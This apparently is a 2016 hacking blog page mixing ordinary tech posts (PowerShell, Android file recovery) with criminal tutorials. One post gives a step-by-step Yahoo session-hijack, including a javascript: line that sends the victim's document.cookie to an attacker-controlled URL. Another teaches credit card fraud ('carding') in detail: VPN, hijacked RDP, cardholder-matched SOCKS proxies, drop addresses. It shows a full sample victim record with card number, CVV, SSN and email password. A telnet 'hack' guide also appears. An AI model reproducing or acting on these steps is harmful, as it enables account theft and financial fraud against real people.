Tuesday, November 22, 2016

Hack Yahoo Account by Cookies Stealing


You Can Hack Yahoo Account by Cookies Stealing or Hijacking From Browser.

Follow Steps and Learn it.
This is very Simple Tutorial and 100% Tested..!!


Step 1: Download the Script on given link
http://www.multiupload.com/9Q3EPTOO47
Step 2: Download and extract files into your hard drive.
S
tep 3: Create a account in any ftp hosting site i suggested www.t35.com
Step 4: Login to your account and upload 4 files into your ftp account.
Step 5: Give this code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 
He would again redirected to his yahoo account.


Step 6: Open the hacked.php . The password is 'hoc'...
You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password of victim account.

Email Hacking can be possible


Do U Think If Your Email Can Not Been Hackable, Then You Are Wrong...
Ur Email-ID Can Be Hack... But Its Can Be Hack Only Fault by User.. Most Of The Peoples Think That Their Has A Software to Hack A Email- ID's But Truth Is Their Is No Software Present For Hacking Ur Mail ID's..

Email Hacking can be possible to many ways like:-


1. Social Engineering


2.Phishing Attacks

3. Cookie Hijacking


4. Keyloggers

1.Social Engineering:

This Process is defined as Hack the human mind without any tools...This has become one of the hottest topics today and it seems to work out most of the times. Social Engineering doesn’t deal with the network security issues, vulnerabilities, exploits,etc. It just deals with simple Psychological tricks that help to get the information we want. This really works!! But it requires a lot of patience.We are all talking about network security and fixing the vulnerabilities in networks.But what happens if some internal person of a network accidentally gives out the passwords. After all we are all humans; we are also vulnerable and can be easily
exploited and compromised than the computers.
exploited and compromised than the computers.Social Engineering attacks have become most common during the chat sessions. With the increase in use of Instant Messengers, any anonymous person may have a chat with another any where in the world. The most crucial part of this attack is to win the trust of the victim.


2.Phishing Attack:


The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information.


3.Cookie Hijacking:


In cookie hijacking we can hack email accounts very easily.. This trick is verydangereous because whenever user change a password then there is no need toattacker for again hack Email- ID of victim. And it would take you to inbox of victim's yahoo account without asking for any password of victim account.

Hack Yahoo Account by Cookies Stealing

4.Keyloggers:

Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about.Keyloggers, as a surveillance tool, are often used by employers to ensure employeesuse work computers for business purposes only. Unfortunately, keyloggers can alsobe embedded in spyware allowing your information to be transmitted to an unknown third party.

Monday, November 21, 2016

Microsoft Replaces Command Prompt With PowerShell As Windows 10 Default Shell



Microsoft has released a new Windows 10 Insider Build 14971. The latest release brings many new features likes the ability to read EPUB books in Microsoft Edge web browser, and the new Paint 3D application. Another big change in Build 14971 comes in the form of making PowerShell the default shell in Windows 10.

What if I want to stick with Command Prompt?

Microsoft has included Command Prompt in its Windows operating systems since a very long time. One the other hand, PowerShell is a comparatively newer and more powerful shell in Windows operating system. With this change, Microsoft aims to bring “the best command line experiences to the forefront for all power users”.
From now on, in Windows 10, PowerShell will be the defacto command shell from File Explorer. If you’ll press WIN+X, you’ll get PowerShell menu. Command Prompt is also replaced from the context menu that pops up when you Shift+Right-click any empty space. Typing cmd in Run will also open PowerShell in the new Windows 10 Insider build.
If you aren’t ready to accept this change and ditch Command Prompt, you can opt out of the WIN+X change. To do this, open Settings > Personalization > Taskbar. Now, turn the “Replace Command Prompt with Windows PowerShell in the menu when I right-click the Start button or press Windows key+X” option to “Off”.
The users are having a choice at the moment, but the future of Command Prompt remains unclear. One can expect Redmond to remove Command Prompt completely in future.
Fun Fact: Microsoft is also celebrating PowerShell’s 10th birthday this week. So, a shift to a more powerful shell shouldn’t shock Windows users.

Hack a Computer Only with just a IP Address


Hak4u presents you an easy tutorial to hack a Computer only with a just a IP Address in six simple steps.

Steps :
1) Prepare the IP address of the Victim. (e.g : 101.23.53.70 )

2) Download and Install Advanced Port Scanner.


3) Open Advanced Port Scanner and Type the IP Address in the right column and Click Scan.


4) It will lists you all Opened Ports of the Victim’s PC or Router. (e.g : Port 91 ) 5) After retrieving the IP address and the Opened Ports of the Victim, Open Command Prompt (CMD) and Type: telnet [IP ADDRESS] [PORT] e.g : telnet 101.23.53.05  91

Sunday, November 20, 2016

What Is Carding and How to Do It

What is Carding ?

Carding is a term describing the trafficking of credit card, bank account and other personal information online as well as related fraud services.

How to Do It


First let's start on what you need:

1. Computer/laptop,knowledge of hacking,Smart Brain etc...

2.
A virtual private network (VPN) extends a private network across a public network, such as the Internet. It enables a computer to send and receive data across shared or public networks as if it was directly connected to the private network while benefitting from the functionality, security and management policies of the private network.This is done by establishing a virtual point-to-point connection through the use of dedicated connections, encryption, or a combination of the two. ( You got a lot of free VPN software on the Internet, or trial) 






3.
 Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose while the other computer must run RDP server software.
Clients exist for most versions of Microsoft Windows (including Windows Mobile), Linux, Unix, Mac OS X, iOS, Android, and other modern operating systems. RDP servers are built into Windows operating systems; an RDP server for Linux also exists. By default, the server listens on TCP port 3389.
Microsoft currently refers to their official RDP server software as Remote Desktop Services, formerly "Terminal Services". Their official client software is currently referred to as Remote Desktop Connection, formerly "Terminal Services Client"
You can connect to RPD by clicking on start menu - remote desktop connection - then type victims IP address. Example 42.7.44.78, click connect, now it will pop up the screen asking for password and username which is in this case: Username: Shipping Password shipping1. Now click ok, and you will get access to Remote Desktop Connection - which means you are connected to someone computer and you will buy stuff from victims computer. Not YOURS!



4.
SOCKS5 SOCKet Secure (SOCKS) is an Internet protocol that routes network packets between a client and server through a proxy server. SOCKS5 additionally provides authentication so only authorized users may access a server. Practically, a SOCKS server proxies TCP connections to an arbitrary IP address, and provides a means for UDP packets to be forwarded. SOCKS performs at Layer 5 of the OSI model (the ******* layer, an intermediate layer between the presentation layer and the transport layer).


How to use socks5?
Socks5 are very easy to use via Mozilla Firefox. First open Mozilla Firefox, next stepis firefox - options - advanced - network - connections - settings. Now the screen will pop up various options like: 1. No proxy; 2.Auto Detect; 3.Use system proxy; 4. Manual proxy configuration.


Example of socks4/socks5 is 75.119.127.189:36871




You mark 4.Manual proxy configuration. Now type in socks host IP you have, example Socks Host: 75.119.127.189 Port: 1080. Press ok and you are connected to secure socks5. Will explain more when we start carding.


5.
Victims credit card, you can get a lot of credit cards information using sqli injection, or you can buy one from various CVV shops that can be found on the internet. Example off victims credit card:
First Name: charlie
Middle Name: James
Last Name: ponting
Spouse Name:Father Name:Billing Address: 9006 Peppertree circleCity: WichitaState: MsZip Code: 67226Country: USPhone Number: 3166342050
Credit Card Information:*********
Card Type: CreditCredit
 Card Number: 5102 4129 0001 1332
Exp. Date : 6/June / 2012
Name On Card: C. James Ponting
Cvv2: 474
Mother Maiden Name: pennySocial 
Security Number: 515 16 4160
Birth Day: 28Birth Month: 02Birth Year: 1926
Account Information:*******
AOL ID: hjimdoc@aol.com
Password: Jm6227mh
Note: This is the only example off victims credit card, you don't need all this information to the card like DOB (date of birth) SSN (social security number) etc. Some sites ask only for card numbers, ex-date, and cvv2.Now that you have all this above,let's start cardingFirst of all, I want to recommend a website shop from your country.
Why? Because you don't need to wait a lot for your package. In my country, they deliver in 2 days, most 3 days. I am sure there are a lot of cell phones shops in any country. Use google and find it.
There are two types of shops, VBV and NONVBV:VBV is a Verified by Visa, an online security system for credit card transactions. Which means you need to provide a card knowing a lot of victim credit card information such as DOB (date of birth), SSN (social security numbers), the Secure password which cc owner use for the online purchase. 
What You can check on the shop is there a VBV VERIFIED BY VISA ICON on the home page.NONVBV is not verified by visa card, you can buy anything with NONVBV cards without going thru 3rd verification process.

Let us say we want the free phone like Samsung S7, IPHONE 6, Sony Z etc...

1. Connect to your VPN software and chose ip - the country you want.
2. Connect to RPD ( Remote Desktop connection), must be same country (IP), state as card holder Address. Do not forget that.

3. Now from your RPD, connect to socks5 via Mozilla firefox, example 97.77.96.226 34539 United States, MUST BE SAME ASS CARD HOLDER: COUNTRY, STATE, CITY!

4. When you were done all that, create the email with the same name as credit card holder name, same address, same city, and everything. Or if you got email access that would be a lot better.

5. Go to your website shop you want to card. ( don't be lazy and find a good your private shop from your country or any other that ships worldwide).

6. Register with credit card holder information, name, country, city, address, and email you made one just for this ORDER.

7. Add a shipping address, some sites don't allow to ship to the different address but there are plenty of shops which do. Shipping address is where the package will be delivered. Which means you provide your address, girlfriend address, friend address, to your drop etc.

8. Select the product you want, and click on check out, now it will ask for you know, how you will pay. Choose credit card, and type victim's credit card numbers and other information needed.

9. Click order now, and I am sure 100% they will confirm your order via email or you will track your order on the website, after pressing order.


10. Wait for the order to arrive at your shipping address.
When they arrive they call me, and I can say different address where I want to pick up my order. Sign in with fake name you provided and run xDDDDDDDDD. Just joking. Be a calm down like you just stole 100 MILION US DOLLARS and take the package. Use item for yourself or sell it.


Warning:- Remember this is Only for the Education Purpose, "hak4u" will not take any Responsible, if any wrong happens with you!!!!


Saturday, November 19, 2016

How to recover deleted files from Android


If you have deleted any files on your computer then you can use Recuva software to recover data from hard drive. But when it comes to Android then we have no idea, but, don’t worry; Dr.Fone an effective app that helps you to recover deleted photos on Android.
Dr.Fone is available on Android, iOS, Microsoft Windows and Macintosh. The app is compatible with more than 6,000 devices on Android platform. Dr.Fone is priced at $49.95, for the lifetime license. If not you can use the 30-day free trial version too.

List of features included in Dr.Fone:

  • Android SD Card Data Recovery
  • Android Data Extraction
  • Android Lock Screen Removal
  • Android Sim Unlock 

How to:


Step 1: Download and install Wondershare Dr.Fone software on your computer and on your device.
Step 2: Connect the device to your computer and enable USB Debugging to start the process. ( your phone will be rooted via a one-click root utility, after the installation, it will be unrooted automatically)
Step 3: After scanning the files, choose the list of files that needs be recovered.
Step 4: Wait for some time to recover the data.
Note: Wondershare Dr.Fone roots the device to recover data.

Top 10 Countries with Most Hackers- Cyber Criminals

Here below we are listing the top ten countries with most cyber criminals that have expertise in hacking. 1. CHINA: Topping the list as told...